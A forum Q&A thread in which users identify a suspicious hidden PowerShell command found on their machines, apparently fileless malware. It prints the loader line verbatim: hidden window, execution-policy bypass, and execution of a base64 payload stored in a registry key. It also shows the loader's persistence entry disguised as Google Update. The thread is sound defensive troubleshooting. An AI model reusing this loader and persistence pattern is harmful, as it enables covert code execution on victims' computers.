我如何读取在后台运行的Powershell脚本的内容？

Question

I get this line by ProcessExplorer

C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL').LOOTDA)));

It looks suspicious or normal ? Is that mean that the script is saved in registry and not in a file ? how to read then ?

Edit : Now i'm sure that can be an encoded virus when i read this on the registry :

Google Update REG_SZ
"C:\\Users\\michael\\AppData\\Local\\Google\\Update\\GoogleUpdate.exe" /c {BE9473EA-5660-4BF7-91C3-2A2258213EE1} REG_SZ C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL').LOOTDA)));

Edit on 29/03/2016 @ 15:55

If anybody want to continue this discussion i asked it here to decode this virus :

How can i read the source code of this encoded powershell script from the registry?

Answer 1

C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL').LOOTDA)));

This code means that PowerShell will execute with no window and bypassing ExecutionPolicy restrictions a command from registry key HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL (base64-encoded).

Looks like a virus to me.

You can identify the command if you execute this code in the PowerShell console:

([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)))

This will show you what is intended to execute.

Answer 2

I got the same. i'm not sure, but it would be a hidden script runs in powershell. the script may be a phishing one. i think mine send emails to my outlook contacts.